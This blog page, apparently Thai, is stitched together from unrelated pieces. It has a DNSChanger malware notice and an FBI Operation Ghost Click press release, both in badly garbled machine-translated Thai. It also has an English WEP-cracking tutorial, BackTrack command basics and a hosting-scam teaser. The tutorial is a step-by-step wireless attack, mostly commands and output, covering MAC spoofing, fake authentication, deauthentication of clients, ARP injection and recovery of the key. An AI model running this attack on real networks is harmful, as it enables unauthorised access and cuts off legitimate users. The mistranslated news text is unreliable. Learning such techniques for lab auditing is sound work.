DNSChanger :: อัพเดทวันที่ 12 มีนาคม 2012 เพื่อช่วยเหลือผู้ที่ตกเป็นเหยื่อรับผลกระทบจากซอฟต์แวร์ที่เป็นอันตราย DNSChanger

อัพเดทวันที่ 12 มีนาคม 2012: เพื่อช่วยเหลือผู้ที่ตกเป็นเหยื่อรับผลกระทบจากซอฟต์แวร์ที่เป็นอันตราย DNSChanger เอฟบีไอที่ได้รับคำสั่งศาลซึ่งอนุญาตอินเทอร์เน็ตระบบ Consortium (ISC) ในการปรับใช้และบำรุงรักษาทำความสะอาดชั่วคราวเซิร์ฟเวอร์ DNS วิธีการแก้ปัญหานี้เป็นชั่วคราวให้เวลาเพิ่มเติมสำหรับผู้ที่ตกเป็นเหยื่อในการทำความสะอาดเครื่องคอมพิวเตอร์ที่ได้รับผลกระทบและเรียกคืนการตั้งค่าของพวกเขาปกติ DNSเซิร์ฟเวอร์ DNS ที่สะอาดจะถูกปิดเมื่อ 9 กรกฎาคม 2012 และคอมพิวเตอร์ยังคงได้รับผลกระทบโดย DNSChanger อาจสูญเสียการเชื่อมต่ออินเทอร์เน็ตในเวลานั้น

นอกจากนี้คุณยังสามารถทดสอบเพื่อดูว่าคุณได้รับผลกระทบโดยการเยี่ยมชมเว็บไซต์ต่อไปนี้ DNSChanger วันที่ขึ้นด้านล่าง หากตรวจสอบเว็บไซต์นี้ขึ้นมาบ่งบอกว่าคุณกำลังรับผลกระทบจาก DNSChanger นั้นไปhttp://www.dcwg.org/cleanup.htmlสำหรับข้อมูลเกี่ยวกับวิธีการแก้ไขปัญหานี้

URL

ภาษา

ผู้ดูแล

http://www.dns-ok.us/ ภาษาอังกฤษ DNS Changer Working Group (DCWG)
http://www.dns-ok.de/ ภาษาเยอรมัน Bundeskriminalamt (BKA)
Bundesamt für Sicherheit in der Informationstechnik (BSI)
http://www.dns-ok.fi/~~V เสร็จสิ้น CERT-Fi
http://www.dns-ok.ax/~~V ภาษาสวีเดน CERT-Fi
http://www.dns-ok.be/ ดัตช์ / ฝรั่งเศส CERT.be
http://www.dns-ok.fr/ ภาษาฝรั่งเศส CERT-LEXSI
http://www.dns-ok.ca/ ภาษาอังกฤษ / ฝรั่งเศส Cira และ CCIRC
http://www.dns-ok.lu/~~V ภาษาอังกฤษ CIRCL
http://dns-ok.nl/~~V ดัตช์ / อังกฤษ SIDN

วิธีตรวจว่า 9 กรกฏาคมนี้คุณจะเล่นอินเตอร์เน็ตได้หรือไม่ ?

วันจันทร์ที่ 9 กรกฏาคมนี้ มีกระแสข่าวว่ามัลแวร์จะบุกโจมตี DNS ซึ่งเป็นทางเชื่อมต่ออินเทอร์เน็ต ซึ่งหากโดนเปลี่ยน DNS ก็จะทำให้เข้าเว็บไซต์ที่ต้องการไม่ได้ เช่น เข้าเว็บไซต์นี้ กลายเป็นอีกเว็บไซต์หนึ่ง โดยเราเรียกปรากฎการณ์มัลแวร์นี้ว่า DNSChanger เมื่อ DNS ถูกเปลี่ยน เข้าเว็บไหนก็จะถูกเชื่อมโยงไปยังอีกเว็บไซต์หนึ่ง

โดยทาง FBI ได้ปิดโดเมนซึ่งได้รับผลกระทบจากมัลแวร์ DNSChanger ซึ่งเคยเกาะบนเว็บไซต์มาตั้งแต่ปี 2007 โดยการทำงานของมัลแวร์นี้ จะทำการ redirect ทราฟฟิก ด้วยโฆษณาแบบจ่ายเงิน ซึ่งถือว่าเป็นอาชญากรทางไซเบอร์จากผู้ไม่หวังดี ผลคือทำให้คุณเข้าเว็บไซต์ที่ต้องการไม่ได้

ผลกระทบที่น่าเป็นห่วง แม้ว่า FBI พยายามที่จะแจ้งเตือนผู้ใช้ให้ตรวจสอบ ว่าหากระบบของพวกเขาได้รับผลกระทบจาก DNSChanger เพราะคอมพิวเตอร์กว่า 275,000 เครื่องจะมีความเสี่ยงในการถูกโจมตี โดยจะไม่สามารถเชื่อมโยงไปยังเว็บไซต์ที่ต้องการได้ในวันจันทร์ที่ 9 กรกฎาคมนี้ (อินเทอร์เน็ตไม่ได้ถูกตัดการเชื่อมต่อ แต่จะเข้าเว็บไซต์ที่ต้องการไม่ได้เพราะถูก redirect ไปอีก DNS หนึ่งแทน)


มีข่าวดีที่จะตรวจสอบว่าคอมพิวเตอร์ของคุณมีความเสี่ยงหรือได้รับผลกระทบจากการโจมตีนี้หรือไม่ โดยทาง DNS Changer Working Group (DCWG) ได้ออกเครื่องมือในการตรวจสอบแบบเข้าใจง่ายๆ หากคลิกลิงก์แล้วปรากฏสีเขียว แสดงว่าคอมพิวเตอร์ของคุณปลอดภัย
จากมัลแวร์ตัวนี้ (หากปรากฎสีแดง คอมพิวเตอร์ของคุณถูกมัลแวร์โจมตีเข้าให้แล้ว) โดยเข้าไปตรวจสอบที่เว็บไซต์ http://www.dns-ok.us

Operation Ghost Click International Cyber Ring That Infected Millions of Computers Dismantled

หกชาติ Estonian ได้รับการจับกุมและตั้งข้อหากับการทำงานอินเตอร์เน็ตแหวนที่มีความซับซ้อนการทุจริตที่ล้านติดไวรัสของคอมพิวเตอร์ทั่วโลกที่มีไวรัสและเปิดใช้งานขโมยที่จะจัดการหลายพันล้านดอลลาร์อุตสาหกรรมโฆษณาทางอินเตอร์เน็ต ผู้ใช้งานของเครื่องที่ติดไวรัสไม่ทราบว่าคอมพิวเตอร์ของพวกเขาได้รับการโจมตีหรือว่าซอฟต์แวร์ที่เป็นอันตรายกลายเป็นเครื่องของพวกเขาเสี่ยงที่จะโฮสต์เป็นของไวรัสอื่น ๆ

รายละเอียดของสองปีที่เรียกว่าเอฟบีไอสอบสว Ghost Click การดำเนินงานที่ถูกประกาศในวันนี้ในนิวยอร์กเมื่อคำฟ้องของรัฐบาลกลางที่ถูกเปิดผนึก เจ้าหน้าที่ยังอธิบายความพยายามของพวกเขาเพื่อให้เข้าถึงผู้ใช้อินเทอร์เน็ตที่ติดไวรัสแน่ใจว่าจะได้ไม่ถูกรบกวนเป็นผลมาจากการดำเนินงาน

คำฟ้องกล่าวว่า

ผู้ช่วยผู้กำกับในความดูแลของสำนักงานนิวยอร์กของเราใหม่ “อธิบายสมรู้ร่วมคิดระหว่างประเทศที่ซับซ้อนรู้สึกและดำเนินการโดยอาชญากรที่มีความซับซ้อน.” เธอเสริมว่า “อันตรายลือโดยจำเลยไม่ได้เป็นเพียงเรื่องของการเก็บเกี่ยวนอกกฎหมาย รายได้. ”

จุดเริ่มต้นในปี 2007, แหวนไซเบอร์ใช้ชั้นของมัลแวร์ที่เรียกว่า DNSChanger ที่จะติดไวรัสประมาณ 4 ล้านเครื่องในกว่า 100 ประเทศ มีประมาณ 500.000 การติดไวรัสในสหรัฐฯรวมทั้งเครื่องคอมพิวเตอร์เป็นของบุคคลธุรกิจและหน่วยงานภาครัฐเช่น NASA ได้ ขโมยก็สามารถที่จะจัดการกับการโฆษณาทางอินเตอร์เน็ตในการสร้างอย่างน้อย $ 14,000,000 ค่าธรรมเนียมที่ผิดกฎหมาย ในบางกรณีมัลแวร์มีผลกระทบเพิ่มเติมในการป้องกันซอฟต์แวร์ป้องกันไวรัสของผู้ใช้และระบบปฏิบัติการจากการปรับปรุงจึงเปิดเผยเครื่องที่ติดไวรัสไปยังซอฟต์แวร์ที่เป็นอันตรายมากขึ้นแม้

“พวกเขาถูกจัดระเบียบและการดำเนินงานเป็นธุรกิจแบบดั้งเดิม แต่แสวงหาผลกำไรอย่างผิดกฎหมายเป็นผลมาจากมัลแวร์” หนึ่งในตัวแทนของเราในโลกไซเบอร์ที่ทำงานกรณีดังกล่าว “มีระดับของความซับซ้อนที่นี่ว่าเราไม่ได้เห็นมาก่อนคือ”.

ชื่อโดเมน DNS-System-เป็นบริการอินเทอร์เน็ตที่สำคัญที่จะแปลงชื่อโดเมนที่ใช้งานง่ายเช่น http://www.fbi.gov เป็นที่อยู่ตัวเลขที่อนุญาตให้ใช้คอมพิวเตอร์ในการพูดคุยกัน โดยไม่ต้อง DNS และเซิร์ฟเวอร์ DNS ที่ดำเนินการโดยผู้ให้บริการอินเทอร์เน็ตที่ผู้ใช้คอมพิวเตอร์จะไม่สามารถที่จะเรียกดูเว็บไซต์หรือส่ง e-mail
DNSChanger ถูกใช้ในการเปลี่ยนเส้นทางผู้ใช้ไปยังเซิร์ฟเวอร์ที่ไม่สงสัยโกงควบคุมโดยขโมยไซเบอร์ช่วยให้พวกเขาจัดการกับกิจกรรมทางเว็บของผู้ใช้ เมื่อผู้ใช้คอมพิวเตอร์ที่ติดไวรัสจากการคลิกที่ลิงค์สำหรับเว็บไซต์อย่างเป็นทางการของ iTunes เช่นที่พวกเขาถูกนำไปแทนเว็บไซต์สำหรับธุรกิจไม่ใช่ บริษัท ในเครือที่มีแอปเปิ้ลอิงค์เจตนาที่จะขายซอฟต์แวร์แอปเปิ้ล ไม่เพียง แต่ได้ขโมยไซเบอร์สร้างรายได้จากโครงการเหล่านี้พวกเขาขาดผู้ประกอบการเว็บไซต์ที่ถูกต้องและผู้โฆษณาของรายได้ที่สำคัญ

หกอาชญากรไซเบอร์ถูกนำเข้าห้องขังเมื่อวานนี้ในเอสโตเนียโดยเจ้าหน้าที่ท้องถิ่นและสหรัฐจะหาทางที่จะส่งผู้ร้ายข้ามแดนนั้น ร่วมกับการจับกุมเจ้าหน้าที่สหรัฐยึดเครื่องคอมพิวเตอร์และเซิร์ฟเวอร์ DNS ที่โกงสถานที่ต่างๆ ในฐานะที่เป็นส่วนหนึ่งของคำสั่งศาลของรัฐบาลกลาง, เซิร์ฟเวอร์ DNS โกงได้ถูกแทนที่ด้วยเซิร์ฟเวอร์ที่ถูกต้องในหวังว่าผู้ใช้ที่ติดไวรัสไม่สามารถเข้าถึงอินเทอร์เน็ตของพวกเขากระจัดกระจาย

มันเป็นสิ่งสำคัญที่จะทราบว่าเซิร์ฟเวอร์ทดแทนจะไม่ลบไวรัสมัลแวร์หรืออื่น ๆ DNSChanger มันอาจจะมีการอำนวยความสะดวกที่ได้รับจากคอมพิวเตอร์ที่ติดไวรัส ผู้ใช้ที่ชื่อว่าคอมพิวเตอร์ของพวกเขาอาจจะติดไวรัสควรจะติดต่อมืออาชีพคอมพิวเตอร์ พวกเขายังสามารถค้นหาข้อมูลเพิ่มเติมในการเชื่อมโยงในหน้านี้รวมถึงวิธีการลงทะเบียนเป็นเหยื่อของมัลแวร์ DNSChanger และสำนักงานเอฟบีไอขอความช่วยเหลือผู้ที่เกิดปัญหาจะให้การปรับปรุงเป็นระยะ ๆ ติดต่อ  877-236-8947

Scenario 1 : Cracking WEP with Backtrack and aircrack-ng (แฮกไวเลสสำหรับผู้ที่อ่านภาษาอังกฤษเป็นเท่านั้น !)

Scenario 1 : WEP encryption, OPEN Authentication, MAC filtering enabled, active client on network

The AP in my testlab uses MAC filtering and is configured to use WEP, using OPEN Authentication Method.

In this scenario, I have 2 clients that are currently connected to the wireless network.

My auditor laptop (and old IBM T22) runs backtrack beta 4, and has a PCMCIA network card (Proxim, Atheros chipset) and a Dlink USB Wireless Adapter (DWL-G122).  Both adapters will work just fine, however I get better results with the proxim PCMCIA card because it has a range extender.

The process of cracking the wep key for this scenario is

  • Put wireless interface in monitor mode (airmon-ng start wireless_interface)
  • Find wireless network (channel, BSSID and ESSID)  (airodump-ng wireless_interface_in_monitor_mode)
  • Find a valid / connected client (MAC Address)
  • Wait until client is gone and change mac address to valid client MAC  (airmon-ng stop wireless_intifconfig wireless_int down, macchanger –m XX:XX:XX:XX:XX:XX wireless_int, ifconfig wireless_int up, airmon-ng start wireless_int)
  • Associate with AP and inject ARP packets (airodump-ng –c <channel> –-ivs –w /tmp/filename wireless_int_in_monitormode, aireplay-ng –fakeauth 0 –a <BSSID> –h <local MAC> –e ESSID wireless_int_in_monitormode>, aireplay-ng -3 -b <BSSID> wireless_int_in_monitor_mode)
  • If no ARP is found (and injected) in a reasonable amount of time, try to deauthenticate an existing client (aireplay-ng –deauth 0 -a BSSID –c CLientMAC wireless_int_in_monitor_mode)
  • Save IV’s to file and crack the key (airocrack-ng –0 –b BSSID /tmp/filename.ivs)

In all cases, in all scenario’s, the most important component is verifying that you can associate with an AP. You’ll learn some techniques on how to do this in this blog. But let’s not jump ahead.

First, list the adapters :

root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The wifi0 adapter is the proxim pcmcia card.  wlan0 is the Dlink USB adapter.  For this test, we’ll use the proxim card (wifi0).  The mac address of this card is 00:20:A6:4F:A9:41  (you can get the mac address by running ‘ifconfig wifi0’)

First, put the card in monitor mode :

root@bt:~# airmon-ng start wifi0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

A new interface called “ath1” has been created. This interface is the one we are going to use in order to find the wireless networks. Launch “airodump-ng ath1” to hop all channels and show the wireless networks that can be found, and the clients (if any) that are currently associated with an Access Point :

root@bt:~# airodump-ng ath1

CH  1 ][ Elapsed: 1 min ][ 2009-02-19 14:05                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    

 00:14:BF:89:9C:D3   34      104        0    0  11  54 . WEP  WEP         TestNet                                                   

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

 00:14:BF:89:9C:D3  00:1C:BF:90:5B:A3   55   0- 1      0       12  TestNet
 00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   71   0- 1     32      441  TestNet

Ok, so we have found a network with ESSID “TestNet”, operating at channel 11. Apparently there are 2 clients connected to this AP.

Let’s see if we can associate with Access Point with MAC (BSSID) 00:14:BF:89:9C:D3

First, run airodump-ng again, but set it to look at channel 11.  This is required for the AP association/authentication (via aireplay-ng) to operate at channel 11 as well (because you cannot specify the channel to use when running aireplay-ng) :

root@bt:/# airodump-ng --channel 11 ath1

Leave the airodump-ng running for now and run the following aireplay-ng command to perform a ‘fake authentication’ attempt :

root@bt:~# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:20:A6:4F:A9:41)
14:14:50  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11

14:14:50  Sending Authentication Request (Open System) [ACK]
14:14:50  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Authentication failed (code 1)

14:14:53  Sending Authentication Request (Open System) [ACK]
14:14:53  AP rejects the source MAC address (00:20:A6:4F:A9:41) ?
Authentication failed (code 1)

Ok – Authentication failed, so the AP does MAC filtering. We could try to use the MAC address of one of the clients that are already connected (by specifying its MAC address using the –h parameter), but we’ll change the MAC address on our interface (which will make all future commands shorter)

First, kill the airodump-ng process.  Take wifi0 (ath1) out of monitoring mode :

root@bt:~# airmon-ng stop ath1

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

root@bt:~# airmon-ng

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)

Bring wifi0 down, change the mac address of wifi0, bring wifi0 up again and then put the interface back in monitor mode :

root@bt:~# ifconfig wifi0 down
root@bt:~# macchanger -m 00:1C:BF:90:5B:A3 wifi0
Current MAC: 00:20:a6:4f:a9:44 (Proxim, Inc.)
Faked MAC:   00:1c:bf:90:5b:a3 (unknown)
root@bt:~# ifconfig wifi0 up
root@bt:~# airmon-ng start wifi0

Interface       Chipset         Driver

wifi0           Atheros         madwifi-ng
wlan0           Ralink 2573 USB rt73usb - [phy0]
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

root@bt:~# ifconfig ath1
ath1      Link encap:UNSPEC  HWaddr 00-1C-BF-90-5B-A3-D0-03-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:106 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:9448 (9.4 KB)  TX bytes:0 (0.0 B)

Ok, looks good

Let’s see if it makes a difference.  Run airodump-ng again (airodump-ng –c 11 ath1) and then try to perform the fake authentication again

root@bt:/# aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:20:19  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11

14:20:19  Sending Authentication Request (Open System) [ACK]
14:20:19  Authentication successful
14:20:19  Sending Association Request [ACK]
14:20:19  Association successful :-) (AID: 1)

If you are connecting to an AP that is a bit picky, then you have some options to tweak the aireplay-ng behaviour :

aireplay-ng -1 6000 -o 1 -q 12 -e TestNet -a 00:14:BF:89:9C:D3 ath1

–1 6000 = reauthenticate every 6000 seconds

-o 1 = only send one set of packets at a time

-q 12= send keepalive packets every 12 seconds   (sometimes, it works better without this last parameter)

From this point forward, you should be able to associate with the AP. If not, there’s no use in continuing with the process.

Ok, now let’s try to crack the key. First, stop the existing airodump process and run airodump-ng with the option to save the iv’s to a file (parameter –i   or  –ivs):

root@bt:~# airodump-ng -c 11 -w /tmp/TestNetAudit1 -i ath1

CH 11 ][ Elapsed: 12 s ][ 2009-02-19 14:24                                         

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                

00:14:BF:89:9C:D3   34 100      135        0    0  11  54 . WEP  WEP    OPN  TestNet                                               

BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   43   0- 1     10       84  TestNet

The number of #Data packets is most likely still very low and does not go up as fast as we want it to. So we need to grab an ARP packet and inject it.

First, launch aireplay-ng in injection mode :

root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:26:55  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Saving ARP requests in replay_arp-0219-142655.cap
You should also start airodump-ng to capture replies.
Read 243 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

(leave this running – wait until an ARP request is seen. The tool will then automatically attempt to inject the ARP packets, thus increasing the number of data packets (and iv’s) on the network). Some AP’s require you to be associated (or will perform disassociate after a while). It might take a couple of minutes before an ARP is seen. If you don’t have a lot of time, it might help trying to associate yourself again :

aireplay-ng --fakeauth 0 -a 00:14:BF:89:9C:D3 -e TestNet ath1

If that does not generate the required ARP packet(s), which should set off the ARP injection, then try to deauthenticate the existing clients. (which may not work very well if the AP has MAC filtering enabled. If you have a second client MAC address, you can set your own MAC address to one of the clients and try to deauth the other client…)

Keep the aireplay-ng and airodump-ng running and run the deauth attack.

root@bt:/# aireplay-ng --deauth 0 -a 00:14:BF:89:9C:D3 ath1
14:38:15  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
14:38:15  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:16  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:17  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:17  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:18  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:19  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]
14:38:19  Sending DeAuth to broadcast -- BSSID: [00:14:BF:89:9C:D3]

If this works, the valid client will be disconnected. When the client connects again (in most cases, this happens automatically), and after max. a couple of minutes, you should see that the ARP injection process starts to work :

root@bt:~# aireplay-ng -3 -b 00:14:BF:89:9C:D3 ath1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:1C:BF:90:5B:A3)
14:39:08  Waiting for beacon frame (BSSID: 00:14:BF:89:9C:D3) on channel 11
Saving ARP requests in replay_arp-0219-143908.cap
You should also start airodump-ng to capture replies.
Redd 7951 packets (got 878 ARP requests and 589 ACKs), sent 7116 packets...(499 pps)

 

At the same time, you should start to see the number of data packets increasing rapidly :

CH 11 ][ Elapsed: 7 mins ][ 2009-02-19 14:32 ]                                          

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                

00:14:BF:89:9C:D3   34  97     4582    41799  814  11  54 . WEP  WEP    OPN  TestNet

BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           

00:14:BF:89:9C:D3  00:19:5B:52:AD:F7   71   0- 1     46     2495  TestNet
00:14:BF:89:9C:D3  00:1C:BF:90:5B:A3   34  54- 1      0    51017  TestNet

For a 128bit WEP key, you’ll probably need between 80000 and 250000 data packets.  However you don’t need to wait until you’ve gathered all those packets. You can already try to break the key using the ivs file that is being generated.  As long as the key is not found, and the number of packets keeps growing, the crack process will automatically reread the file and attempt to crack the key.

By the time I wrote the last 2 lines of text, I had already captured 140000 IVs, which appears to be sufficient to crack the key in one shot.  So if your coverage is good, signal is strong, and the injection works well, it may go very fast.

root@bt:/# aircrack-ng –0 -b 00:14:BF:89:9C:D3 /tmp/TestNetAudit1-01.ivs
Opening /tmp/TestNetAudit1-01.ivs
Reading packets, please wait...

Aircrack-ng 1.0 rc2 r1415

[00:00:01] Tested 865 keys (got 140507 IVs)

   KB    depth   byte(vote)
    0    0/  1   A3(203120) 73(160718) 31(256416) 18(156160) DD(154112) FE(153344)
    1    0/  9   EA(193816) 22(150440) AD(254880) 0D(153856) 9B(153856) 4B(153600)
    2    0/  1   D3(212716) AD(197696) 22(135904) E6(153601) 4A(153334) 89(151208)
    3    7/  3   AA(153630) 1F(122064) B0(141808) BB(151552) 3C(151040) F8(150724)
    4   13/  4   DD(150086) 23(139760) 05(129534) E4(149504) 04(149248) 70(149238) 

             KEY FOUND! [ A3:EA:D3:AA:DD:73:22:AD:1F:23:31:AD:22 ]
        Decrypted correctly: 100%

If you would not have had enough IVs, the aircrack-ng process would just sit and wait until the file has grown bigger and would then attempt to crack the key again.

If the packets all of a sudden stop increasing, then stop the injection process, start it again, re-associate, perhaps deauthenticate an existing client and it should continue to grow.

In my case, the key was cracked in 1 second.  The total process took about 10 minutes.

The key is 26 characters, so if we assume that the key is in hex, we are dealing with 128bit WEP. This mode is also called WEP104

(In case you forgot : WEP40 = 64bit, WEP104 = 128bit, WEP1xx = 256bit)

Linux Backtrack Commands Basic Usage ! (คำสั่งเบื้องต้น)

Once the installation of BackTrack is done, the default username and password required to log in are root / toor.

NOTE: You will not be able to see the password as you type it.

Starting a GUI Environment

After you are logged in you can start the GUI Environment by issuing the startx command.

X wont start!

In rare occasions (such as after a VMware tools install, or when using unsupported Video cards), X will refuse to start. If that happens you have several options you can try in order to fix the issue:

  • Reconfiguring the X server package, you can reset (and often fix) Xorg configurations with the following command:
   root@bt:~# dpkg-reconfigure xserver-xorg
  • If you are using Backtrack 5 on x64 with KDE you should try the following:
   root@bt:~# rm /root/.kde/cache-*

NOTE: Sometimes you may need to also remove the cache folders in /var/tmp by issuing the following command:

   root@bt:~# rm -rf /var/tmp/kdecache-*

Getting Networking to work

If you haven’t noticed yet BackTrack does not boot with networking by default in order to increase its stealth.

Setting your IP manually

We will first set up the networking manually. In the following example we will assume the following addresses and their purpose:

   IP Address      -  192.168.1.112/24
   Default Gateway -  192.168.1.1
   DNS server      -  192.168.1.1

In order to set these up we will run the following commands:

root@bt:~# ifconfig eth0 192.168.1.112/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

 

Getting a static IP to stick between reboots

These settings however will only last until you reboot, so if we want to save them between reboots we need to edit the /etc/network/interfaces file like this:

# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5). 

# The loopback network interface 
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
        address 192.168.1.112
        netmask 255.255.255.0
        network 192.168.1.0
        broadcast 192.168.1.255
        gateway 192.168.1.1

Edit the file as appropriate, then have the network come up automatically at boot time:

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart

Getting an IP from DHCP

In order to get an IP from a DHCP server we can issue the dhclient <interface> command as follows:

root@bt:~# dhclient eth0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/eth0/00:0c:29:81:74:21
Sending on   LPF/eth0/00:0c:29:81:74:21
Sending on   Socket/fallback
DHCPREQUEST of 192.168.1.112 on eth0 to 255.255.255.255 port 67
DHCPACK of 192.168.1.112 from 192.168.1.1
bound to 192.168.1.112 -- renewal in 37595 seconds.
root@bt:~#

Using the script to start networking

There is a script to start networking in the /etc/init.d directory which attempts to start every interface listen in /etc/network/interfaces (you can remove the ones you don’t need). To start it issue the following command:

root@bt:~# /etc/init.d/networking start

WICD Network Manager

Another way to set up your networking is using the WICD Network Manager, you can find it in the menu:

Menu > Internet > Wicd Network Manager

NOTE: Notice that when starting WICD you will get an error:

Wicd error.png
In order to get rid of this error you have to reboot Backtrack, than BEFORE starting WICD open up a terminal and type in the following:

root@bt:~# dpkg-reconfigure wicd
root@bt:~# update-rc.d wicd defaults

Now after a reboot the error should not occur anymore.

Changing the root password

As you know Backtrack comes with a default username and password (root/toor) it is IMPORTANT that we change that root password especially when running services such as SSH. We can change the password by issuing the passwd command:

root@bt:~# passwd Enter new UNIX password: {enter your new password here } Retype new UNIX password: {enter your new password again} passwd: password updated successfully root@bt:~#

 

Starting services

BackTrack has various services such as Apache, SSH, MySQL, VNC, etc. They are all disabled by default. To start a service such as SSH, you can use the service init scripts. For example, to start the SSH service:

root@bt:~# sshd-generate  # Specific to the SSH service - needed to generate SSH keys
root@bt:~# /etc/init.d/ssh start
Starting OpenBSD Secure Shell server: sshd.
root@bt:~# /etc/init.d/ssh stop 
Stopping OpenBSD Secure Shell server: sshd.
root@bt:~#

When using a ssh server for the first time on Backtrack you will need to generate keys:

root@bt:~# sshd-generate

To enable a service at boot time, you can use the update-rc.d command, for example, having SSH start at boot time:

root@bt:~# update-rc.d -f ssh defaults
 Adding system startup for /etc/init.d/ssh ...
  /etc/rc0.d/K20ssh -> ../init.d/ssh
  /etc/rc1.d/K20ssh -> ../init.d/ssh
  /etc/rc6.d/K20ssh -> ../init.d/ssh
  /etc/rc2.d/S20ssh -> ../init.d/ssh
  /etc/rc3.d/S20ssh -> ../init.d/ssh
  /etc/rc4.d/S20ssh -> ../init.d/ssh
  /etc/rc5.d/S20ssh -> ../init.d/ssh
root@bt:~#

 

Common apt commands

apt-get install <package> Downloads <package> and all of its dependencies, and installs or upgrades them.

apt-get remove [–purge] <package> Removes <package> and any packages that depend on it. –purge specifies that packages should be purged.

apt-get update Updates packages listings from the repo, should be run at least once a week.

apt-get upgrade Upgrades all currently installed packages with those updates available from the repo. should be run once a week.

apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.

apt-cache search <pattern> Searches packages and descriptions for <pattern>.

apt-cache show <package> Shows the full description of <package>.

apt-cache showpkg <package> Shows a lot more detail about <package>, and its relationships to other packages.

man apt Will give you more info on these commands as well as many that are in less common usage.

 

Common dpkg commands

dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for example.

dpkg -c <package.deb> Lists the contents of <package.deb> a .deb file.

dpkg -I <package.deb> Extracts package information from <package.deb> a .deb file.

dpkg -r <package> Removes an installed package named <package>

dpkg -P <package> Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.

dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.

dpkg -s <package> Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.

dpkg-reconfigure <package> Reconfigures an installed package

man dpkg Will give you more info on these commands as well as many that are in less common usage.

 

How do I find more information on a particular command or programs usage ?

Most commands will have what is called a man page (manual page) which can be viewed by typing:

root@bt:~# man <command you want more info on>

Another very good resource on linux command usage can be found at linuxcommand.org

Some programs do not have a man page, but you can usually get more information on it’s usage by typing:

root@bt:~# <program name> Just the program name without any arguements.

or

root@bt:~# <program name> -help

or

root@bt:~# <program name> --help

or

root@bt:~# <program name> -h

Some programs use other methods, but they are usually just a variation of one of the above five commands.

ระวังการโกงของผู้ให้บริการ”โฮสติ้ง”และแนะนำวิธีการเลือก

เทคนิคและกลวิธีในการเลือกใช้งาน Web Hosting รวมถึงการจับกลโกงและสารพัดเทคนิคที่เว็บโฮสติ้งสมัยนี้ ใช้หลอกลูกค้ากันครับ

